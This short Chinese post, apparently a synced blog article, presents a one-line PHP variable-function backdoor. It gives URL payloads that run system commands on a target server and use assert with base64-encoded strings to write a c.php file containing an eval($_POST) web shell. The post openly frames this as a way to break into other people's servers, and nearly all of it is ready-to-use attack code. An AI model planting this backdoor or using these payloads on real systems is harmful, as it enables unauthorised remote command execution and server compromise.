这是一个非常简单的php可变函数,用get方法传参就能构成后门
<?php
$_GET['a']($_GET['b']);
?>
如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。
?a=system&b=ipconfig
如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
本文使用 文章同步助手 同步
